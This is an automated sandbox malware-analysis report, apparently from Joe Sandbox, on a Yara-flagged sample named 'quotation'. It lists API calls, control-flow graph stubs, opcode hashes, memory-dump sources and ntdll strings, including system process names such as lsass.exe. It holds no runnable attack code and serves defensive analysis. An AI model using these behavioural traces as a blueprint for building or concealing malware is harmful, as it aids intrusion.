                                                                                  • Opcode ID: 54d6f386663d5f6ad0a9369f0d80f04f2da9edb397004349e0dbd63b4fb0560c
                                                                                  • Instruction ID: 852cf962e2409d618e8b38b88b5540d93302ef35c3232a8832e2f214825db3c9
                                                                                  • Opcode Fuzzy Hash: 54d6f386663d5f6ad0a9369f0d80f04f2da9edb397004349e0dbd63b4fb0560c
                                                                                  • Instruction Fuzzy Hash: 090125B5E0020DA7DF10DBE5DC42FDEB378AB54308F4081A6E90897241F675EB58C795

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 98 42cab3-42caec call 404883 call 42dd13 NtClose
                                                                                  APIs
                                                                                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CAE7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381205965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_quotation.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Close
                                                                                  • String ID:
                                                                                  • API String ID: 3535843008-0
                                                                                  • Opcode ID: 0972272d2523aad39672e0d6cd6478e3c5c68d2fec25f3726e41a2152dbfdc4c
                                                                                  • Instruction ID: 1f7ce933016469cc88b19e90322ff2e304760343167cfa218f45b51e943dd486
                                                                                  • Opcode Fuzzy Hash: 0972272d2523aad39672e0d6cd6478e3c5c68d2fec25f3726e41a2152dbfdc4c
                                                                                  • Instruction Fuzzy Hash: A8E02C362102007BC620FAAADC01FAB736CEFC5B24F00402EFA08A7242C374B90083F0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 116 12f2b60-12f2b6c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 67f089f381d2b68f297e419898672a99ff41765302aefcebdf41bb770df0dd58
                                                                                  • Instruction ID: 21eaba16019cff5b1fc465f4880cee5be9f4b1c2bf9c72ae6f07df50fab1ac01
                                                                                  • Opcode Fuzzy Hash: 67f089f381d2b68f297e419898672a99ff41765302aefcebdf41bb770df0dd58
                                                                                  • Instruction Fuzzy Hash: F3900265602800439106715C4424616404A97E0205B55C061E10145D4DC52589D56225

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 118 12f2df0-12f2dfc LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: a91585e6a1f0804c03d08f8ffff24dfdbbd13b8de132fb1b897083c87627120b
                                                                                  • Instruction ID: 543d39d6c4b26dcabb12ec46188cd589602545ceb2346d9be9925296b35d6cf5
                                                                                  • Opcode Fuzzy Hash: a91585e6a1f0804c03d08f8ffff24dfdbbd13b8de132fb1b897083c87627120b
                                                                                  • Instruction Fuzzy Hash: D490023560180453E112715C4514707004997D0245F95C452A042459CDD6568A96A221

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 117 12f2c70-12f2c7c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: f21eb8747f86addaf77516cc1361ed34f87efc47c5133ac74778e528c9b80d07
                                                                                  • Instruction ID: 2145964fb828989c347cf961c0427fb3012962f47332a55482ed6428fa2947ca
                                                                                  • Opcode Fuzzy Hash: f21eb8747f86addaf77516cc1361ed34f87efc47c5133ac74778e528c9b80d07
                                                                                  • Instruction Fuzzy Hash: 1990023560188842E111715C841474A004597D0305F59C451A442469CDC69589D57221
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 2fa55755776bdb72428a12694452f2b158e66ce8270dbb6a2a1594d3158ea298
                                                                                  • Instruction ID: 78c7b917c4afae5266896b7dc76a71ae7202aaf5d565bea2ae95e1a4f8c01d71
                                                                                  • Opcode Fuzzy Hash: 2fa55755776bdb72428a12694452f2b158e66ce8270dbb6a2a1594d3158ea298
                                                                                  • Instruction Fuzzy Hash: E8900235A0590442E101715C4524706104597D0205F65C451A04245ACDC7958A9566A2

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(sE716IK71M,00000111,00000000,00000000), ref: 00414520
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381205965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_quotation.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: sE716IK71M$sE716IK71M
                                                                                  • API String ID: 1836367815-922563818
                                                                                  • Opcode ID: b45cae07c9c219c099e0826546d53defafec1ad3bdbe238061a0a9cc026b5f1f
                                                                                  • Instruction ID: 2c93fbf58faf19b7145b43889d661f3b69fec038b2ff8a571458cfb118ad8616
                                                                                  • Opcode Fuzzy Hash: b45cae07c9c219c099e0826546d53defafec1ad3bdbe238061a0a9cc026b5f1f
                                                                                  • Instruction Fuzzy Hash: 4A110431E4021876EF219AA1AC42FEF7F789F81754F448059FA04BB281DAB856068BE5

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 14 4144a3-4144b3 15 4144bc-414511 call 42f623 call 417c23 call 4047f3 call 425223 14->15 16 4144b7 call 42ec13 14->16 25 414533-414538 15->25 26 414513-414524 PostThreadMessageW 15->26 16->15 26->25 27 414526-414530 26->27 27->25
                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(sE716IK71M,00000111,00000000,00000000), ref: 00414520
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381205965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_quotation.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: sE716IK71M$sE716IK71M
                                                                                  • API String ID: 1836367815-922563818
                                                                                  • Opcode ID: 3de012e5431b6b67fac50700b1926275c7c37100b9222c36437f17da7e8deb27
                                                                                  • Instruction ID: 8504cfec16b6aedebdd5f95c05872cee6fb7df1a624910d20b6db10e5d894ebc
                                                                                  • Opcode Fuzzy Hash: 3de012e5431b6b67fac50700b1926275c7c37100b9222c36437f17da7e8deb27
                                                                                  • Instruction Fuzzy Hash: 4C01D671E4021876EB2196A1AD02FDF7B7C9F41B54F444059FB047B2C1EBB86A068BE5

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 28 42ce33-42ce77 call 404883 call 42dd13 RtlFreeHeap
                                                                                  APIs
                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CE72
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381205965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_quotation.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeHeap
                                                                                  • String ID: qiA
                                                                                  • API String ID: 3298025750-529955485
                                                                                  • Opcode ID: e3b5d95ba1a83d426d625c5e4c7fafcd7ca98a1b0cb9b90bc850c9ae22092b0e
                                                                                  • Instruction ID: 307251ad091670c87d9754cbc308c92c0932808cc59762c095a9376aec0cd4cc
                                                                                  • Opcode Fuzzy Hash: e3b5d95ba1a83d426d625c5e4c7fafcd7ca98a1b0cb9b90bc850c9ae22092b0e
                                                                                  • Instruction Fuzzy Hash: 0CE06D722042547BCB14EE99DC41EDB37ACEFC9714F00442EF909A7241C770B91086B5

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 42 417cdf-417d05 43 417d06-417d07 42->43 44 417d09-417d18 43->44 45 417d6c-417d6e 43->45 48 417d1a-417d45 44->48 49 417ccf-417cdb 44->49 46 417d70-417d81 45->46 47 417dbe-417dde call 42ba63 45->47 48->43 59 417d47-417d48 48->59 56 417c83-417c97 LdrLoadDll 49->56 57 417c9a-417c9d 49->57 56->57 59->45
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C95
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381205965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_quotation.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: a74df69d41897592aaf7166ddb8974ec87685279e0badbf6da0a133babb8fc0f
                                                                                  • Instruction ID: ce8e9651cd2f2632962265eba7574f4be5e24a99500c9861ae4b74542ff918d8
                                                                                  • Opcode Fuzzy Hash: a74df69d41897592aaf7166ddb8974ec87685279e0badbf6da0a133babb8fc0f
                                                                                  • Instruction Fuzzy Hash: F521F17254C20A9BCB019FB8EC41BF4B774CF06324F208799DCAD9B2D1E6255D4687D2

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 60 417c1c-417c1e 61 417c20-417c4c call 42f753 60->61 62 417c58-417c60 60->62 74 417c52-417c60 call 42fd53 61->74 75 417c4e-417c51 61->75 63 417c70-417c81 call 42e1f3 62->63 64 417c62-417c6d call 42fff3 62->64 71 417c83-417c97 LdrLoadDll 63->71 72 417c9a-417c9d 63->72 64->63 71->72 74->63 74->64
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C95
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381205965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_quotation.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: 1fd0e5ac93c599581ea8bd70fbed3e05817cf44cc4c3a5592a884bcc08fa010a
                                                                                  • Instruction ID: 75b5f9b12f12b08821b09bdb01f26dfbe1d2dcd7f16dd92e0ccb1d816d0901d5
                                                                                  • Opcode Fuzzy Hash: 1fd0e5ac93c599581ea8bd70fbed3e05817cf44cc4c3a5592a884bcc08fa010a
                                                                                  • Instruction Fuzzy Hash: 4801F5B1E44109ABDF10DBA0DC42FDE77749B14308F0082BAE9189B280F635E749C791

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 93 42cde3-42ce27 call 404883 call 42dd13 RtlAllocateHeap
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(?,0041E9BA,?,?,00000000,?,0041E9BA,?,?,?), ref: 0042CE22
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381205965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_quotation.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: bfaddf89e5a8eb70fee58dbc14e955cd0c08b1bcf189c1afe2af08f3aab36983
                                                                                  • Instruction ID: a4553a69e7b92f9cf539882023bc9044ba2095210ba8bf1258456adc3d3cad5f
                                                                                  • Opcode Fuzzy Hash: bfaddf89e5a8eb70fee58dbc14e955cd0c08b1bcf189c1afe2af08f3aab36983
                                                                                  • Instruction Fuzzy Hash: 13E039762003057BDA14EE59EC41EAB37ACEF89754F104419FE09A7241D770B9108AB5

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 103 42ce83-42cebf call 404883 call 42dd13 ExitProcess
                                                                                  APIs
                                                                                  • ExitProcess.KERNEL32(?,00000000,00000000,?,07461022,?,?,07461022), ref: 0042CEBA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381205965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_quotation.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExitProcess
                                                                                  • String ID:
                                                                                  • API String ID: 621844428-0
                                                                                  • Opcode ID: 604045ff2199d70e6ced359132bb827253c9192b951670fad5067483bfa99023
                                                                                  • Instruction ID: e3fc04d785b94c74c51f8313a7f33e58d860eb092d5abf4673d4ecc5aa500898
                                                                                  • Opcode Fuzzy Hash: 604045ff2199d70e6ced359132bb827253c9192b951670fad5067483bfa99023
                                                                                  • Instruction Fuzzy Hash: 7AE08C762002147BE620FB5ADC05F9B776CDFC5724F10842AFA08AB281CAB1BA0187F5

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 108 417cd6-417cdb 110 417c83-417c97 LdrLoadDll 108->110 111 417c9a-417c9d 108->111 110->111
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C95
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381205965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_quotation.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: b0c3561975e8df5829d7d66e24a3c02e50a0ddf0ef6dad8d752497c06571edb3
                                                                                  • Instruction ID: 3234135dea13a840063d5cb5e5c33c926c874a0ab7bab67cfa608a0389ac5317
                                                                                  • Opcode Fuzzy Hash: b0c3561975e8df5829d7d66e24a3c02e50a0ddf0ef6dad8d752497c06571edb3
                                                                                  • Instruction Fuzzy Hash: 01E0127564410EABEB40CFC4C881FEDB3B4EB08208F109285E91C97240E530AA46CB85

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 112 12f2c0a-12f2c0f 113 12f2c1f-12f2c26 LdrInitializeThunk 112->113 114 12f2c11-12f2c18 112->114
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: e1ec73d7505f00c8d874a1a1c83aeead327ef114b476f99799a86e40f60a08c1
                                                                                  • Instruction ID: 09c02f4eb3061897af1ed3fa233f0d80d48177fb1370d8f4abb0f61508f51e93
                                                                                  • Opcode Fuzzy Hash: e1ec73d7505f00c8d874a1a1c83aeead327ef114b476f99799a86e40f60a08c1
                                                                                  • Instruction Fuzzy Hash: 21B09B71D019D5C5FA12E76446087177940B7D1705F16C075D3030685F8738C1D5E375
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-2160512332
                                                                                  • Opcode ID: 17f2687e3309df28069a3497a1ae7d517ee28b25d4d16e97c41a2eca8474091a
                                                                                  • Instruction ID: 3d409830899ded34dd2c63721adac31440f223da5dfeefaf99c86b87b77d7a85
                                                                                  • Opcode Fuzzy Hash: 17f2687e3309df28069a3497a1ae7d517ee28b25d4d16e97c41a2eca8474091a
                                                                                  • Instruction Fuzzy Hash: 20929F71618342AFE721DF28C880B6BBBE8BBC4758F04492DFA95D7251D770E844CB96
                                                                                  Strings
                                                                                  • Critical section debug info address, xrefs: 0132541F, 0132552E
                                                                                  • Thread identifier, xrefs: 0132553A
                                                                                  • undeleted critical section in freed memory, xrefs: 0132542B
                                                                                  • Critical section address, xrefs: 01325425, 013254BC, 01325534
                                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013254CE
                                                                                  • double initialized or corrupted critical section, xrefs: 01325508
                                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013254E2
                                                                                  • Critical section address., xrefs: 01325502
                                                                                  • 8, xrefs: 013252E3
                                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0132540A, 01325496, 01325519
                                                                                  • corrupted critical section, xrefs: 013254C2
                                                                                  • Invalid debug info address of this critical section, xrefs: 013254B6
                                                                                  • Address of the debug info found in the active list., xrefs: 013254AE, 013254FA
                                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 01325543
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                  • API String ID: 0-2368682639
                                                                                  • Opcode ID: 17d2e6dcda1e76e8bab8855f4c954ecb305945519ff0936698061c53444d12a4
                                                                                  • Instruction ID: b68c454fa91e60474a77f64ca8d1419893e776b5818a08af79b8869f1e5cb4d0
                                                                                  • Opcode Fuzzy Hash: 17d2e6dcda1e76e8bab8855f4c954ecb305945519ff0936698061c53444d12a4
                                                                                  • Instruction Fuzzy Hash: 3A818BB0A50358EFDF20DF99C845BAEBBB9FB09704F644119F605B7640D375A940CB90
                                                                                  Strings
                                                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01322506
                                                                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01322602
                                                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 013225EB
                                                                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01322412
                                                                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 013222E4
                                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01322624
                                                                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01322409
                                                                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 0132261F
                                                                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01322498
                                                                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 013224C0
                                                                                  • @, xrefs: 0132259B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                  • API String ID: 0-4009184096
                                                                                  • Opcode ID: bade76fce5671aea989e7522c38056f43a29cc82e0dc66785d9a9acc17f36faa
                                                                                  • Instruction ID: b5ee401e5eb4eae37e6216947bef467ee33c324ffe51e2f19607962afe98d1dd
                                                                                  • Opcode Fuzzy Hash: bade76fce5671aea989e7522c38056f43a29cc82e0dc66785d9a9acc17f36faa
                                                                                  • Instruction Fuzzy Hash: 51029FB1D10229DBDB31DB58CC85BAAB7B8AB44304F4151EAE709B7241EB709E84CF59
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                  • API String ID: 0-2515994595
                                                                                  • Opcode ID: f4a605a99fc7c0c2c74218dcac2741e51f0110dc53e95f58f9d86bc4acd6d0e1
                                                                                  • Instruction ID: 4c1fdf001f2b618f3040e1b9c43b765429173a2d14316d42d31edd66114bfdf4
                                                                                  • Opcode Fuzzy Hash: f4a605a99fc7c0c2c74218dcac2741e51f0110dc53e95f58f9d86bc4acd6d0e1
                                                                                  • Instruction Fuzzy Hash: 5851F0711253459BD725DF1A8844FABBBECEF94B48F14096DAE55C3280E770D504CB92
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                  • API String ID: 0-1700792311
                                                                                  • Opcode ID: 9623cf63520d3d1fde671cd0ce5228a99783f4330b1204812352c86b3bb2d0f4
                                                                                  • Instruction ID: 17ee7c8d6f6990c4e8a82492ce559735d95e02157c2305c9886b1f552c133807
                                                                                  • Opcode Fuzzy Hash: 9623cf63520d3d1fde671cd0ce5228a99783f4330b1204812352c86b3bb2d0f4
                                                                                  • Instruction Fuzzy Hash: C0D10C31610286DFDB2ADF68C442AAEBBF9FF4A718F48C049F545AB656C7759880CF10
                                                                                  Strings
                                                                                  • HandleTraces, xrefs: 01338C8F
                                                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01338A3D
                                                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01338A67
                                                                                  • VerifierDlls, xrefs: 01338CBD
                                                                                  • VerifierFlags, xrefs: 01338C50
                                                                                  • AVRF: -*- final list of providers -*- , xrefs: 01338B8F
                                                                                  • VerifierDebug, xrefs: 01338CA5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                  • API String ID: 0-3223716464
                                                                                  • Opcode ID: f35c45fea60af51dbba33c45a9332d07d6b62c54d6027f405c438ea362e34889
                                                                                  • Instruction ID: 4fc527d186f3eb273cb1a40469d15ad8a4128abd115037d73c26fe441b6c69b6
                                                                                  • Opcode Fuzzy Hash: f35c45fea60af51dbba33c45a9332d07d6b62c54d6027f405c438ea362e34889
                                                                                  • Instruction Fuzzy Hash: B19127B1645706EFEB21EF6C8880B6BB7A8EBD471CF840698FA416B240C7709C05C799
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                  • API String ID: 0-1109411897
                                                                                  • Opcode ID: eac40b4c91709048483870268d44fb517e6e3941a65514dee728563ad6eba4c9
                                                                                  • Instruction ID: 7be815b16073b3b5a2de8a4648bf37b38fdee4858d0fed2251f1e96633d307cd
                                                                                  • Opcode Fuzzy Hash: eac40b4c91709048483870268d44fb517e6e3941a65514dee728563ad6eba4c9
                                                                                  • Instruction Fuzzy Hash: E1A25974A2562A8FDB68CF19CD887E9BBB5BF45348F1442E9D90DA7254DB709E80CF00
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-792281065
                                                                                  • Opcode ID: b87e5a0fb3d5b5e4ff1bda01f60d25b98124c67657df3a34b037ce90ef1d467b
                                                                                  • Instruction ID: e971a28ae8799b0fd7722c1f7974d00af71cf397209d40e3a8f39359d967e070
                                                                                  • Opcode Fuzzy Hash: b87e5a0fb3d5b5e4ff1bda01f60d25b98124c67657df3a34b037ce90ef1d467b
                                                                                  • Instruction Fuzzy Hash: FE912870B20326DBEB35EF59D849BAA7BE5FF61B18F940128E6046B6C1D7B09801C7D0
                                                                                  Strings
